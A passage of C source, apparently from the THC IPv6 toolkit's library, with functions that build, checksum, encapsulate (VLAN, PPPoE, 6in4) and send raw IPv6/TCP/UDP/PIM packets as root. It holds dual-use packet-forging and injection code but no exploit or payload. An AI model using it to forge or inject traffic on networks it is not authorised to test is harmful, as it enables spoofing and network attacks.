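    memcpy(ihdr->data, data, data_len);
  }

  if (option_len > 0 && option != NULL) {
    if (option_len % 4 > 0)
      option_len = (((option_len / 4) + 1) * 4);
    // calloc: thc_generate_pkt() copies option_len bytes into the frame, so
    // the padding must not be uninitialised heap memory
    if ((ihdr->option = calloc(1, option_len)) == NULL) {
      free(ihdr->data);
      free(ihdr);
      return -1;
    }
    ihdr->option_len = option_len;
    memcpy(ihdr->option, option, i);    // i = length before padding
  }

  if (hdr->final != NULL) {
    ehdr = (thc_ipv6_ext_hdr *) hdr->final;
    ehdr->next_segment = (char *) ihdr;
    ehdr->next = NXT_TCP;
  } else {
    hdr->next_segment = (char *) ihdr;
    hdr->next = NXT_TCP;
  }
  hdr->final = (char *) ihdr;
  hdr->final_type = NXT_TCP;

  ihdr->sport = sport;
  ihdr->dport = dport;
  ihdr->sequence = sequence;
  ihdr->ack = ack;
  ihdr->flags = flags;
  ihdr->window = window;
  ihdr->urgent = urgent;
//  if (checksum == 0) {
  ihdr->checksum = DO_CHECKSUM;
//  } else
//    ihdr->checksum = checksum;

  i = (20 + option_len) / 4;            // header length in 32 bit words
  ihdr->length = ((i % 16) * 16) + (i / 16);
  hdr->length += data_len + 20 + option_len;
  *pkt_len += data_len + 20 + option_len;

  return 0;
}

/*
 * Append a UDP datagram as the final header of the packet descriptor pkt.
 *
 * checksum  0 = DO_CHECKSUM, anything else is stored as given
 * data/data_len  payload, copied
 *
 * hdr->length and *pkt_len grow by data_len + 8. Returns 0, or -1 if memory
 * could not be allocated, in which case the header chain is left untouched.
 */
int thc_add_udp(unsigned char *pkt, int *pkt_len, unsigned short int sport, unsigned short int dport, unsigned int checksum, char *data, int data_len) {
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;
  thc_udp_hdr *ihdr = malloc(sizeof(thc_udp_hdr));
  thc_ipv6_ext_hdr *ehdr;

  if (ihdr == NULL)
    return -1;
  memset(ihdr, 0, sizeof(thc_udp_hdr));
  ihdr->data = NULL;
  ihdr->data_len = 0;

  // copy the payload first; a failed malloc() must not reach memcpy()
  if (data_len > 0 && data != NULL) {
    if ((ihdr->data = malloc(data_len)) == NULL) {
      free(ihdr);
      return -1;
    }
    ihdr->data_len = data_len;
    memcpy(ihdr->data, data, data_len);
  }

  if (hdr->final != NULL) {
    ehdr = (thc_ipv6_ext_hdr *) hdr->final;
    ehdr->next_segment = (char *) ihdr;
    ehdr->next = NXT_UDP;
  } else {
    hdr->next_segment = (char *) ihdr;
    hdr->next = NXT_UDP;
  }
  hdr->final = (char *) ihdr;
  hdr->final_type = NXT_UDP;

  ihdr->sport = sport;
  ihdr->dport = dport;

  if (checksum == 0) {
    ihdr->checksum = DO_CHECKSUM;
  } else
    ihdr->checksum = checksum;

  ihdr->length = data_len + 8;
  hdr->length += data_len + 8;
  *pkt_len += data_len + 8;

  return 0;
}

int thc_add_pim(unsigned char *pkt, int *pkt_len, unsigned char type, unsigned char *data, int data_len) {
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;
  thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr));
  unsigned char *buf = malloc(data_len + 4);

  if (nehdr == NULL || hdr == NULL || buf == NULL) {
    free(nehdr);
    free(buf);
    return -1;
  }

  if (ehdr == NULL) {
    hdr->next = NXT_PIM;
    hdr->next_segment = (char *) nehdr;
  } else {
    ehdr->next = NXT_PIM;
    ehdr->next_segment = (char *) nehdr;
  }
  hdr->final = 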
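(char *) nehdr;
  hdr->final_type = NXT_PIM;

  // buf is a pointer, so sizeof(buf) is the pointer size and not the size of
  // the allocation; clear exactly the data_len + 4 bytes that were requested
  memset(buf, 0, data_len + 4);
  buf[0] = type;
  if (type < 16)
    buf[0] += 32;               // ensure we set a PIM version (here: v2)
  // byte 1: reserved, 2+3: checksum
  memcpy(buf + 4, data, data_len);

  nehdr->next_segment = NULL;
  nehdr->next = type;
  nehdr->data = buf;
  nehdr->data_len = data_len + 4;
  hdr->length += data_len + 4;
  *pkt_len += data_len + 4;

  return 0;
}

/*
 * Append raw payload bytes as the final element of the packet descriptor.
 *
 * pkt       descriptor created by thc_create_ipv6*()
 * pkt_len   in/out: grows by data_len
 * type      stored in the new element's next field
 * data      bytes to append, copied
 * data_len  number of bytes in data
 *
 * Returns 0 on success, -1 on invalid arguments or allocation failure.
 */
int thc_add_data6(unsigned char *pkt, int *pkt_len, unsigned char type, unsigned char *data, int data_len) {
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;
  thc_ipv6_ext_hdr *ehdr, *nehdr;
  unsigned char *buf;

  // check before the first dereference; a negative length or a missing
  // source buffer can not be copied
  if (hdr == NULL || data_len < 0 || (data == NULL && data_len > 0))
    return -1;

  ehdr = (thc_ipv6_ext_hdr *) hdr->final;
  nehdr = malloc(sizeof(thc_ipv6_ext_hdr));
  buf = malloc(data_len);
  if (nehdr == NULL || buf == NULL) {
    free(nehdr);
    free(buf);
    return -1;
  }

  if (ehdr == NULL) {
    hdr->next = NXT_DATA;
    hdr->next_segment = (char *) nehdr;
  } else {
    ehdr->next = NXT_DATA;
    ehdr->next_segment = (char *) nehdr;
  }
  hdr->final = (char *) nehdr;
  hdr->final_type = NXT_DATA;

  // The old memset(buf, 0, sizeof(buf)) cleared pointer-size bytes and wrote
  // past the allocation for short payloads. No clearing is needed at all:
  // the copy fills every byte of buf.
  if (data_len > 0)
    memcpy(buf, data, data_len);

  nehdr->next_segment = NULL;
  nehdr->next = type;
  nehdr->data = buf;
  nehdr->data_len = data_len;
  hdr->length += data_len;
  *pkt_len += data_len;

  return 0;
}

int thc_open_ipv6() {
  char *ptr, *ptr2, tbuf[6], vbuf[4];
  int i = 0;
  struct sockaddr_in servaddr;

  if (thc_socket >= 0)
    return thc_socket;

  if ((ptr = getenv("THC_IPV6_VLAN")) != NULL && strlen(ptr) > 0) {
    ptr = strdup(ptr);
    ptr2 = ptr;
    i = 0;
    while ((ptr2 = index(ptr2, ',')) != NULL) {
      i++;
      ptr2++;
    }
    if (i != 2) {
      fprintf(stderr, "Error: wrong Syntax in THC_IPV6_VLAN variable: source_mac,dst_mac,vlan_id - e.g. 01:02:03:04:05:06,07:08:09:a0:a1:a2,7\n");
      exit(-1);
    }
    ptr2 = strtok(ptr, ",");
    ptr2 = strtok(NULL, ",");
    ptr2 = strtok(NULL, ",");
    i = atoi(ptr2);
    if (strlen(ptr) < 1 || i < 0 || i > 4097 || (i == 0 && ptr[0] != '0')) {
      fprintf(stderr, "Error: wrong Syntax in THC_IPV6_VLAN variable: srcmac,dstmac,vlan-id - e.g. 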
01:02:03:04:05:06,1a:1b:1c:1d:1e:1f,7\n"); exit(-1); } vbuf[0] = 0x81; vbuf[1] = 0x00; vbuf[2] = i / 256; vbuf[3] = i % 256; do_hdr_vlan = 1; do_hdr_off = 4; free(ptr); printf("Information: VLAN injection/sniffing activated\n"); } if ((ptr = getenv("THC_IPV6_PPPOE")) != NULL && strlen(ptr) > 0) { i = 0; do_pppoe = 1; do_hdr_size = _PPPOE_HDR_SIZE + do_hdr_off; if ((do_hdr = malloc(64)) == NULL || (do_capture = malloc(64)) == NULL) { fprintf(stderr, "Error: could not allocate necessary memory\n"); exit(-1); } ptr2 = ptr; while ((ptr2 = index(ptr2, ',')) != NULL) { i++; ptr2++; } if (i != 2) { fprintf(stderr, "Error: wrong Syntax in THC_IPV6_PPPOE variable: source_mac,dst_mac,ppoe_session_id - e.g. 01:02:03:04:05:06,07:08:09:a0:a1:a2,a1b2\n"); exit(-1); } ptr2 = strtok(ptr, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[6], (unsigned int *) &do_hdr[7], (unsigned int *) &do_hdr[8], (unsigned int *) &do_hdr[9], (unsigned int *) &do_hdr[10], (unsigned int *) &do_hdr[11]); memcpy(tbuf, do_hdr + 6, 6); ptr2 = strtok(NULL, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[0], (unsigned int *) &do_hdr[1], (unsigned int *) &do_hdr[2], (unsigned int *) &do_hdr[3], (unsigned int *) &do_hdr[4], (unsigned int *) &do_hdr[5]); memcpy(do_hdr + 6, tbuf, 6); if (do_hdr_vlan) sprintf(do_capture, /*"ether proto 0x8100 and */"ether src %18s", ptr2); else sprintf(do_capture, /*"ether proto 0x8864 and */"ether src %18s", ptr2); if (do_hdr_vlan) memcpy(do_hdr + 12, vbuf, 4); do_hdr[12 + do_hdr_off] = 0x88; do_hdr[13 + do_hdr_off] = 0x64; // PPPoE Header do_hdr[14 + do_hdr_off] = 0x11; do_hdr[15 + do_hdr_off] = 0; ptr2 = strtok(NULL, ","); if (strlen(ptr2) != 4) { fprintf(stderr, "Error: PPPoE session ID must be hexadecimal and a length of four, e.g. 
0a1f\n"); exit(-1); } tbuf[0] = ptr2[0]; tbuf[1] = ptr2[1]; tbuf[2] = 0; sscanf(tbuf, "%x", (unsigned int *) &do_hdr[16 + do_hdr_off]); tbuf[0] = ptr2[2]; tbuf[1] = ptr2[3]; sscanf(tbuf, "%x", (unsigned int *) &do_hdr[17 + do_hdr_off]); // 2 bytes length: 18+19 do_hdr[20 + do_hdr_off] = 0x00; do_hdr[21 + do_hdr_off] = 0x57; if (debug) thc_dump_data(do_hdr, do_hdr_size + do_hdr_off, "PPPoE Header"); // if (/*verbose &&*/ _thc_ipv6_showerrors) printf("Information: PPPoE injection/sniffing activated\n"); } else if ((ptr = getenv("THC_IPV6_6IN4")) != NULL && strlen(ptr) > 0) { do_6in4 = 1; do_hdr_size = _6IN4_HDR_SIZE + do_hdr_off; if ((do_hdr = malloc(64)) == NULL || (do_capture = malloc(64)) == NULL) { fprintf(stderr, "Error: could not allocate necessary memory\n"); exit(-1); } ptr2 = ptr; while ((ptr2 = index(ptr2, ',')) != NULL) { i++; ptr2++; } if (i != 3) { fprintf(stderr, "Error: wrong Syntax in THC_IPV6_6IN4 variable: source_mac,dst_mac,src_ip,dst_ip - e.g. 01:02:03:04:05:06,07:08:09:a0:a1:a2,1.1.1.1,2.2.2.2\n"); exit(-1); } ptr2 = strtok(ptr, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[6], (unsigned int *) &do_hdr[7], (unsigned int *) &do_hdr[8], (unsigned int *) &do_hdr[9], (unsigned int *) &do_hdr[10], (unsigned int *) &do_hdr[11]); memcpy(tbuf, do_hdr + 6, 6); ptr2 = strtok(NULL, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[0], (unsigned int *) &do_hdr[1], (unsigned int *) &do_hdr[2], (unsigned int *) &do_hdr[3], (unsigned int *) &do_hdr[4], (unsigned int *) &do_hdr[5]); memcpy(do_hdr + 6, tbuf, 6); if (do_hdr_vlan) memcpy(do_hdr + 12, vbuf, 4); do_hdr[12 + do_hdr_off] = 8; do_hdr[13 + do_hdr_off] = 0; // IPv4 Hdr do_hdr[14 + do_hdr_off] = 0x45; do_hdr[15 + do_hdr_off] = 0; // 2 bytes length: 16+17 do_hdr[18 + do_hdr_off] = 0; do_hdr[19 + do_hdr_off] = 0; do_hdr[20 + do_hdr_off] = 0; do_hdr[21 + do_hdr_off] = 0; do_hdr[22 + do_hdr_off] = 64; do_hdr[23 + do_hdr_off] = 41; // proto ipv6 do_hdr[24 + do_hdr_off] = 0; 
do_hdr[25 + do_hdr_off] = 0; // hdr chksum: 24+25 ptr2 = strtok(NULL, ","); if (inet_pton(AF_INET, ptr2, &servaddr.sin_addr) != 1) { fprintf(stderr, "Error: 6in4: not a valid IPv4 address: %s\n", ptr2); exit(-1); } memcpy(do_hdr + 26 + do_hdr_off, &servaddr.sin_addr, 4); ptr2 = strtok(NULL, ","); if (inet_pton(AF_INET, ptr2, &servaddr.sin_addr) != 1) { fprintf(stderr, "Error: 6in4: not a valid IPv4 address: %s\n", ptr2); exit(-1); } memcpy(do_hdr + 30 + do_hdr_off, &servaddr.sin_addr, 4); if (do_hdr_vlan) sprintf(do_capture, /*"ether proto 0x8100 and */"ether src %18s", ptr2); else sprintf(do_capture, "ip proto 41 and src %16s", ptr2); if (debug) thc_dump_data(do_hdr, do_hdr_size, "6in4 Header"); // if (/*verbose &&*/ _thc_ipv6_showerrors) printf("Information: 6in4 injection/sniffin activated\n"); } if (do_hdr_vlan == 1 && do_6in4 == 0 && do_pppoe == 0) { do_hdr_size = 14 + do_hdr_off; if ((do_hdr = malloc(64)) == NULL || (do_capture = malloc(64)) == NULL) { fprintf(stderr, "Error: could not allocate necessary memory\n"); exit(-1); } ptr = getenv("THC_IPV6_VLAN"); ptr2 = strtok(ptr, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[6], (unsigned int *) &do_hdr[7], (unsigned int *) &do_hdr[8], (unsigned int *) &do_hdr[9], (unsigned int *) &do_hdr[10], (unsigned int *) &do_hdr[11]); memcpy(tbuf, do_hdr + 6, 6); ptr2 = strtok(NULL, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[0], (unsigned int *) &do_hdr[1], (unsigned int *) &do_hdr[2], (unsigned int *) &do_hdr[3], (unsigned int *) &do_hdr[4], (unsigned int *) &do_hdr[5]); memcpy(do_hdr + 6, tbuf, 6); memcpy(do_hdr + 12, vbuf, 4); do_hdr[16] = 0x86; do_hdr[17] = 0xdd; sprintf(do_capture, /*"ether proto 0x8100 and */"ether src %18s", ptr2); } if (_thc_ipv6_rawmode) return socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_ALL)); // XXX BUG TODO FIXME : no this is not working. 
else return socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP)); } int thc_generate_pkt(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *pkt, int *pkt_len) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr; thc_icmp6_hdr *ihdr; thc_tcp_hdr *thdr; thc_udp_hdr *uhdr; char *next, *mysrcmac = NULL, *mydstmac = NULL, *last_type, *checksum_src; int type, bufptr, do_checksum = 0, offset = 0, i, is_ip4 = 0; if (pkt == NULL || hdr->pkt != NULL || (hdr->pkt = malloc(*pkt_len + 14 + do_hdr_size + 64)) == NULL) return -1; hdr->pkt_len = *pkt_len; if (interface == NULL) interface = default_interface; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (_thc_ipv6_rawmode == 0) { if (do_pppoe || do_6in4 || do_hdr_vlan) { if (do_pppoe) { memcpy(&hdr->pkt[0], do_hdr, do_hdr_size); hdr->pkt[18 + do_hdr_off] = (*pkt_len + 2) / 256; hdr->pkt[19 + do_hdr_off] = (*pkt_len + 2) % 256; } else if (do_6in4) { // 6in4 do_hdr[16 + do_hdr_off] = (*pkt_len + 20) / 256; do_hdr[17 + do_hdr_off] = (*pkt_len + 20) % 256; // hdrchecksum i = calculate_checksum(do_hdr + 14 + do_hdr_off, 20); memcpy(&hdr->pkt[0], do_hdr, do_hdr_size); hdr->pkt[24 + do_hdr_off] = i / 256; hdr->pkt[25 + do_hdr_off] = i % 256; } else { memcpy(&hdr->pkt[0], do_hdr, do_hdr_size); } offset += do_hdr_size; hdr->pkt_len += offset; *pkt_len += offset; } else { offset += 14; hdr->pkt_len += offset; *pkt_len += offset; if (srcmac == NULL) mysrcmac = thc_get_own_mac(interface); else mysrcmac = srcmac; if (dstmac == NULL) mydstmac = thc_get_mac(interface, hdr->src, hdr->dst); else mydstmac = dstmac; if (mysrcmac == NULL || mydstmac == NULL) { if (_thc_ipv6_showerrors) fprintf(stderr, "Error: could not get target MAC address\n"); if (mysrcmac != NULL && srcmac == NULL) free(mysrcmac); if (mydstmac != NULL && dstmac == NULL) free(mydstmac); return -1; } memset(hdr->pkt, 0, *pkt_len); memcpy(&hdr->pkt[0], mydstmac, 6); memcpy(&hdr->pkt[6], mysrcmac, 6); hdr->pkt[12] = IPV6_FRAME_TYPE / 256; 
hdr->pkt[13] = IPV6_FRAME_TYPE % 256; } } hdr->pkt[0 + offset] = ((hdr->version % 16) << 4) | (hdr->class / 16); hdr->pkt[1 + offset] = ((hdr->class % 16) << 4) | ((hdr->label % 1048576) / 65536); hdr->pkt[2 + offset] = (hdr->label % 65536) / 256; hdr->pkt[3 + offset] = hdr->label % 256; hdr->pkt[4 + offset] = hdr->length / 256; hdr->pkt[5 + offset] = hdr->length % 256; if (hdr->next != NXT_IP4_RUDIMENTARY) hdr->pkt[6 + offset] = hdr->next; else hdr->pkt[6 + offset] = NXT_IP4; last_type = &hdr->pkt[7 + offset]; hdr->pkt[7 + offset] = hdr->ttl; memcpy(&hdr->pkt[8 + offset], hdr->src, 16); memcpy(&hdr->pkt[24 + offset], hdr->dst, 16); next = hdr->next_segment; type = hdr->next; bufptr = 40 + offset; checksum_src = hdr->original_src; // here go extension headers (not icmp6, tcp, udp, pim, etc.) // BUT ipv4 yes, but not IP4_RUDIMENTARY while (type == NXT_HDR || type == NXT_ROUTE || type == NXT_FRAG || type == NXT_OPTS || type == NXT_INVALID || type == NXT_IGNORE || type == NXT_AH || type == NXT_ESP || type == NXT_IP4 || type == NXT_IP6) { if (type != NXT_IP4 && type != NXT_IP6) { ehdr = (thc_ipv6_ext_hdr *) next; if (ehdr->next != NXT_IP4_RUDIMENTARY) hdr->pkt[bufptr] = ehdr->next; else hdr->pkt[bufptr] = NXT_IP4; hdr->pkt[bufptr + 1] = ehdr->length; last_type = &hdr->pkt[bufptr]; if (ehdr->data != NULL && ehdr->data_len > 0) { memcpy(&hdr->pkt[bufptr + 2], ehdr->data, ehdr->data_len); if (type == NXT_OPTS && hdr->pkt[bufptr + 2] == 0xc9) { // mobile home address option checksum_src = &hdr->pkt[bufptr + 4]; } } bufptr += 2 + ehdr->data_len; next = ehdr->next_segment; type = ehdr->next; } else { if (type == NXT_IP4) { is_ip4 = bufptr; printf(""); // to be filled XXX TODO FIXME } else if (type == NXT_IP6) { printf(""); // to be filled XXX TODO FIXME } } } // now the rest of protocols that are final destinations switch (type) { case NXT_NONXT: break; case NXT_PIM: ehdr = (thc_ipv6_ext_hdr *) next; memcpy(&hdr->pkt[bufptr], ehdr->data, ehdr->data_len); hdr->pkt[bufptr + 2] 
= 0; hdr->pkt[bufptr + 3] = 0; do_checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_PIM, &hdr->pkt[bufptr], ehdr->data_len); hdr->pkt[bufptr + 2] = do_checksum / 256; hdr->pkt[bufptr + 3] = do_checksum % 256; bufptr += ehdr->data_len; break; case NXT_ICMP6: ihdr = (thc_icmp6_hdr *) next; if (ihdr->checksum == DO_CHECKSUM) { ihdr->checksum = 0; do_checksum = 1; } hdr->pkt[bufptr] = ihdr->type; hdr->pkt[bufptr + 1] = ihdr->code; hdr->pkt[bufptr + 2] = ihdr->checksum / 256; hdr->pkt[bufptr + 3] = ihdr->checksum % 256; hdr->pkt[bufptr + 4] = ihdr->flags / 16777216; hdr->pkt[bufptr + 5] = (ihdr->flags % 16777216) / 65536; hdr->pkt[bufptr + 6] = (ihdr->flags % 65536) / 256; hdr->pkt[bufptr + 7] = ihdr->flags % 256; if (ihdr->data != NULL && ihdr->data_len > 0) memcpy(&hdr->pkt[bufptr + 8], ihdr->data, ihdr->data_len); if (do_checksum) { //memcpy( hdr->final_dst, hdr->pkt + 38, 16); ihdr->checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_ICMP6, &hdr->pkt[bufptr], 8 + ihdr->data_len); /* printf("\n"); thc_dump_data((unsigned char *)hdr->pkt + 22, 16,"packet source"); thc_dump_data((unsigned char *)checksum_src, 16, "original source"); thc_dump_data((unsigned char *)hdr->final_dst, 16, "final destination"); thc_dump_data((unsigned char *)hdr->pkt + 38, 16, "pkt destination"); printf("\n"); */ hdr->pkt[bufptr + 2] = ihdr->checksum / 256; hdr->pkt[bufptr + 3] = ihdr->checksum % 256; do_checksum = 0; } bufptr += 8 + ihdr->data_len; break; case NXT_TCP: thdr = (thc_tcp_hdr *) next; if (thdr->checksum == DO_CHECKSUM) { thdr->checksum = 0; do_checksum = 1; } hdr->pkt[bufptr] = thdr->sport / 256; hdr->pkt[bufptr + 1] = thdr->sport % 256; hdr->pkt[bufptr + 2] = thdr->dport / 256; hdr->pkt[bufptr + 3] = thdr->dport % 256; hdr->pkt[bufptr + 4] = thdr->sequence / 16777216; hdr->pkt[bufptr + 5] = (thdr->sequence % 16777216) / 65536; hdr->pkt[bufptr + 6] = (thdr->sequence % 65536) / 256; hdr->pkt[bufptr + 7] = thdr->sequence % 256; hdr->pkt[bufptr + 
8] = thdr->ack / 16777216; hdr->pkt[bufptr + 9] = (thdr->ack % 16777216) / 65536; hdr->pkt[bufptr + 10] = (thdr->ack % 65536) / 256; hdr->pkt[bufptr + 11] = thdr->ack % 256; hdr->pkt[bufptr + 12] = thdr->length; hdr->pkt[bufptr + 13] = thdr->flags; hdr->pkt[bufptr + 14] = thdr->window % 256; hdr->pkt[bufptr + 15] = thdr->window / 256; hdr->pkt[bufptr + 18] = thdr->urgent % 256; hdr->pkt[bufptr + 19] = thdr->urgent / 256; if (thdr->option != NULL && thdr->option_len > 0) memcpy(&hdr->pkt[bufptr + 20], thdr->option, thdr->option_len); if (thdr->data != NULL && thdr->data_len > 0) memcpy(&hdr->pkt[bufptr + 20 + thdr->option_len], thdr->data, thdr->data_len); if (do_checksum) { //memcpy( hdr->final_dst, hdr->pkt + 38, 16); thdr->checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_TCP, &hdr->pkt[bufptr], 20 + thdr->option_len + thdr->data_len); /* printf("\n"); thc_dump_data((unsigned char *)hdr->pkt + 22, 16,"packet source"); thc_dump_data((unsigned char *)checksum_src, 16, "original source"); thc_dump_data((unsigned char *)hdr->final_dst, 16, "final destination"); thc_dump_data((unsigned char *)hdr->pkt + 38, 16, "pkt destination"); printf("\n"); */ hdr->pkt[bufptr + 16] = thdr->checksum / 256; hdr->pkt[bufptr + 17] = thdr->checksum % 256; do_checksum = 0; } bufptr += 20 + thdr->option_len + thdr->data_len; break; case NXT_IP4_RUDIMENTARY: memcpy(hdr->pkt + bufptr, next, THC_IPv4_RUDIMENTARY_LEN); bufptr += THC_IPv4_RUDIMENTARY_LEN; break; case NXT_UDP: uhdr = (thc_udp_hdr *) next; if (uhdr->checksum == DO_CHECKSUM) { uhdr->checksum = 0; do_checksum = 1; } hdr->pkt[bufptr] = uhdr->sport / 256; hdr->pkt[bufptr + 1] = uhdr->sport % 256; hdr->pkt[bufptr + 2] = uhdr->dport / 256; hdr->pkt[bufptr + 3] = uhdr->dport % 256; hdr->pkt[bufptr + 4] = uhdr->length / 256; hdr->pkt[bufptr + 5] = uhdr->length % 256; if (uhdr->data != NULL && uhdr->data_len > 0) memcpy(&hdr->pkt[bufptr + 8], uhdr->data, uhdr->data_len); if (do_checksum) { //memcpy( hdr->final_dst, 
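hdr->pkt + 38, 16);
      uhdr->checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_UDP, &hdr->pkt[bufptr], 8 + uhdr->data_len);
/*
printf("\n");
thc_dump_data((unsigned char *)hdr->pkt + 22, 16,"packet source");
thc_dump_data((unsigned char *)checksum_src, 16, "original source");
thc_dump_data((unsigned char *)hdr->final_dst, 16, "final destination");
thc_dump_data((unsigned char *)hdr->pkt + 38, 16, "pkt destination");
printf("\n");
*/
      hdr->pkt[bufptr + 6] = uhdr->checksum / 256;
      hdr->pkt[bufptr + 7] = uhdr->checksum % 256;
      do_checksum = 0;
    }
    bufptr += 8 + uhdr->data_len;
    break;
  case NXT_DATA:
    ehdr = (thc_ipv6_ext_hdr *) next;
    memcpy(&hdr->pkt[bufptr], ehdr->data, ehdr->data_len);
    if (ehdr->next == NXT_MIPV6) {
      do_checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_MIPV6, &hdr->pkt[bufptr], ehdr->data_len);
      hdr->pkt[bufptr + 4] = do_checksum / 256;
      hdr->pkt[bufptr + 5] = do_checksum % 256;
    }
    bufptr += ehdr->data_len;
    *last_type = ehdr->next;
    break;
    // XXX TODO FIXME: other protocols
  default:
    if (_thc_ipv6_showerrors)
      fprintf(stderr, "Error: Data packet type %d not implemented!\n", type);
    if (srcmac == NULL)
      free(mysrcmac);
    if (dstmac == NULL)
      free(mydstmac);
    return -1;
  }

  if (bufptr != *pkt_len)
    if (_thc_ipv6_showerrors)
      fprintf(stderr, "Warning: packet size mismatch (%d != %d)!\n", *pkt_len, bufptr);
  if (debug)
    thc_dump_data(hdr->pkt, *pkt_len, "Generated Packet");
  if (srcmac == NULL && mysrcmac != NULL)
    free(mysrcmac);
  if (dstmac == NULL && mydstmac != NULL)
    free(mydstmac);
  if (debug)
    printf("Returning from thc_generate_pkt()\n");

  return 0;
}

/*
 * Transmit an already generated packet on an interface.
 *
 * interface  name of the sending interface; NULL selects default_interface
 * pkt        packet handle (a thc_ipv6_hdr); its ->pkt buffer must hold
 *            between 1 and 65535 bytes
 * pkt_len    not used by this function
 *
 * Returns the result of sendto() (-1 on a send error) or -2 when the
 * arguments cannot be used, the interface name does not fit into
 * sockaddr.sa_data, or no socket is available. Exits the process when the
 * socket could not be opened and the caller is not root, or when the MTU
 * lookup reports -1 for an oversized packet.
 */
int thc_send_pkt(char *interface, unsigned char *pkt, int *pkt_len) {
  struct sockaddr sa;
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;
  size_t name_len;

  if (pkt == NULL || hdr->pkt == NULL || hdr->pkt_len < 1 || hdr->pkt_len > 65535)
    return -2;
  if (interface == NULL)
    interface = default_interface;
  if (interface == NULL)
    return -2;

  /* sa_data is a small fixed array; an unbounded strcpy() of a caller
   * supplied name would write past it. -2 (not -1) is returned so that
   * thc_generate_and_send_pkt() does not retry forever. */
  name_len = strlen(interface);
  if (name_len >= sizeof(sa.sa_data)) {
    if (_thc_ipv6_showerrors)
      fprintf(stderr, "Error: interface name too long: %s\n", interface);
    return -2;
  }
  memset(&sa, 0, sizeof(sa));   /* no uninitialised stack bytes are handed to sendto() */
  memcpy(sa.sa_data, interface, name_len + 1);

  if (thc_socket < 0)
    thc_socket = thc_open_ipv6();
  if (thc_socket < 0 && geteuid() != 0) {
    fprintf(stderr, "Error: Program must be run as root.\n");
    exit(-1);
  }
  /* Still no socket although running as root: report a permanent failure
   * instead of calling sendto() on an invalid descriptor. */
  if (thc_socket < 0)
    return -2;

  if (debug)
    thc_dump_data(hdr->pkt, hdr->pkt_len, "Sent Packet");

  /* outside raw mode the buffer is allowed 14 bytes more than the MTU */
  if ((_thc_ipv6_rawmode > 0 && hdr->pkt_len > thc_get_mtu(interface)) ||
      (_thc_ipv6_rawmode == 0 && hdr->pkt_len > thc_get_mtu(interface) + 14)) {
    if (_thc_ipv6_showerrors)
      fprintf(stderr, "Warning: packet size is larger than MTU of interface (%d > %d)!\n", hdr->pkt_len, thc_get_mtu(interface));
    if (thc_get_mtu(interface) == -1) {
      if (_thc_ipv6_showerrors)
        fprintf(stderr, "Error: interface invalid\n");
      exit(-1);
    }
  }

  return sendto(thc_socket, hdr->pkt, hdr->pkt_len, 0, &sa, sizeof(sa));
}

/*
 * Build the wire image of a packet and send it.
 *
 * Returns -1 when thc_generate_pkt() fails, otherwise 0. The send is
 * repeated (with a 1 microsecond pause) for as long as thc_send_pkt()
 * returns -1; any other result, including -2, ends the loop and still
 * yields 0.
 */
int thc_generate_and_send_pkt(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *pkt, int *pkt_len) {
  if (thc_generate_pkt(interface, srcmac, dstmac, pkt, pkt_len))
    return -1;
  while (thc_send_pkt(interface, pkt, pkt_len) == -1)
    usleep(1);
  return 0;
}

/*
 * Release a packet handle together with the header chain attached to it.
 *
 * The chain is walked through next_segment/next; every data buffer and
 * header structure found is collected and freed afterwards. Always returns
 * NULL so callers can write `pkt = thc_destroy_packet(pkt);`.
 */
unsigned char *thc_destroy_packet(unsigned char *pkt) {
  enum { MAX_PTRS = 16375 };
  char *ptrs[MAX_PTRS];
  int iptr = 0, truncated = 0;
  char *next;
  int type;
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;
  thc_ipv6_ext_hdr *ehdr;
  thc_icmp6_hdr *ihdr;
  thc_tcp_hdr *thdr;
  thc_udp_hdr *uhdr;

  if (pkt == NULL)
    return NULL;

  ptrs[iptr] = (char *) pkt;
  iptr++;
  next = hdr->next_segment;
  type = hdr->next;
  free(hdr->pkt);

  while (type == NXT_HDR || type == NXT_ROUTE || type == NXT_FRAG || type == NXT_OPTS || type == NXT_INVALID || type == NXT_IGNORE || type == NXT_AH || type == NXT_ESP) {
    /* Each extension header needs two slots; keep four free for the
     * final header (up to three) and the terminating NULL. */
    if (iptr + 2 + 4 > MAX_PTRS) {
      truncated = 1;
      break;
    }
    ehdr = (thc_ipv6_ext_hdr *) next;
    ptrs[iptr] = ehdr->data;
    iptr++;
    ptrs[iptr] = (char *) ehdr;
    iptr++;
    next = ehdr->next_segment;
    type = ehdr->next;
  }

  if (truncated) {
    if (_thc_ipv6_showerrors)
      fprintf(stderr, "Error: too many extension headers - some data not free'ed!\n");
  } else {
    switch (type) {
    case NXT_NONXT:
      break;
    case NXT_ICMP6:
      ihdr = (thc_icmp6_hdr *) next;
      ptrs[iptr] = ihdr->data;
      iptr++;
      ptrs[iptr] = (char *) ihdr;
      iptr++;
      break;
    case NXT_TCP:
      thdr = (thc_tcp_hdr *) next;
      ptrs[iptr] = thdr->option;
      iptr++;
      ptrs[iptr] = thdr->data;
      iptr++;
      ptrs[iptr] = (char *) thdr;
      iptr++;
      break;
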